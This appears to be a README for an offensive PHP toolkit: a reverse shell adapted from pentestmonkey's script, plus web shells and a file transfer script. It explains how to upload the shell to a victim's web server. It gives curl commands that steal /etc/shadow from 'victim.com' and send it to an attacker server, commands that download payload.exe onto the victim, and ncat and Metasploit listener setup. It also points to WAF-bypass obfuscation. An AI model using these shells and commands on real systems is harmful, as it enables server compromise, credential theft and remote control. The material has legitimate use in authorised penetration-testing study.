Just a little refresh on the popular PHP reverse shell script pentestmonkey/php-reverse-shell. Credits to the original author!
Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Script will automatically detect the underlying OS.
Works with both, ncat and multi/handler.
Tested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).
Tested on XAMPP for OS X v7.4.10 (64-bit) with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit).
Tested on XAMPP for Windows v7.4.3 (64-bit) with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit).
In addition, everything was tested on Docker images nouphet/docker-php4 with PHP v4.4.0 and steeze/php52-nginx with PHP v5.2.17.
Made for educational purposes. I hope it will help!
Process pipes on Windows OS do not support asynchronous operations so stream_set_blocking(), stream_select(), and feof() will not work properly, but I found a workaround.
/src/reverse/php_reverse_shell.php requires PHP v5.0.0 or greater.
/src/reverse/php_reverse_shell_older.php requires PHP v4.3.0 or greater.
Change the IP address and port number inside the scripts as necessary.
Copy /src/reverse/php_reverse_shell.php to your server's web root directory (e.g. to /opt/lampp/htdocs/ on XAMPP) or upload it to your target's web server.
Navigate to the file with your preferred web browser.
Check the simple PHP web shell based on HTTP POST request.
Check the simple PHP web shell based on HTTP GET request. You must URL encode your commands.
Check the simple PHP web shell v2 based on HTTP GET request. You must URL encode your commands.
Find out more about PHP obfuscation techniques for old versions of PHP at lcatro/PHP-WebShell-Bypass-WAF. Credits to the author!
Check the simple PHP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.
When downloading a file, you must URL encode the file path, and don't forget to specify the output file if using cURL.
When uploading a file, don't forget to specify @ before the file path.
Depending on the server configuration, downloading a file through HTTP GET request parameter might not always work, instead, you will have to hardcore the file path in the script.
Navigate to the script on the victim's web server with your preferred web browser, or use cURL from you PC.
Upload a file to the server's web root directory from your PC:
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe
Download a file from the server to your PC:
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow
If you elevated your initial privileges within your reverse shell, this script might not have the same privileges as the shell. In that case, to download a certain file, you might need to copy the file to the web root directory and set the necessary read permissions.
From your PHP reverse shell, run the following cURL commands.
Upload a file from the victim's PC to your server's web root directory:
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow
Download a file from your server's web root directory to the victim's PC:
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe
curl -skL -X GET https://my-server.com/payload.exe -o payload.exe
To set up a listener, open your preferred console on Kali Linux and run one of the examples below.
Set up ncat listener:
ncat -nvlp 9000
Set up multi/handler listener:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit
Figure 1 - Ncat
Figure 2 - Script's Dump